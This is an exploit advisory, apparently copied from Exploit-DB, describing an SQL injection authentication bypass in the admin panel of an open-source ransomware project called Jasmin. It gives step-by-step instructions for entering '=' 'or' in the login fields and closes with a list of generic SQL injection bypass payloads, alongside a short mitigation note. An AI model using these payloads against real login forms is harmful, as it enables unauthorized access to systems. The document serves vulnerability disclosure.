Jasmin Ransomware SQL Injection Login Bypass

vendor:

Jasmin Ransomware

by:

Buğra Enis Dönmez

7.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Jasmin Ransomware

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows

2025

Jasmin Ransomware SQL Injection Login Bypass

The Jasmin Ransomware application is vulnerable to SQL Injection which allows an attacker to bypass authentication on the login page by inserting a specially crafted payload into the email and code fields. By entering the payload '=' 'or' in both the email and code fields, an attacker can bypass the authentication and gain unauthorized access to the admin panel.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs, use parameterized queries, and implement proper input validation to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Jasmin Ransomware SQL Injection Login Bypass
# Google Dork: N/A
# Date: 05-03-2025
# Exploit Author: Buğra Enis Dönmez
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: N/A
# Tested on: Windows

How to exploit :

--> Open Admin Panel Through : http://localhost/login.php

--> Enter the SQL Injection Auth Bypass Payload to Email like : '=' 'or'

--> And to Access Code, Enter the same SQL Injection Authentication Bypass Payload : '=' 'or'

--> Press Authorize

--> Congratz, you're in

--> SQL Injection Authentication Bypass Payload : '=' 'or'

--> Payloads Can be use :

' or '1'='1

' or ''='

'=' 'or'

' OR '1'='1';-- -

' or 1 -- -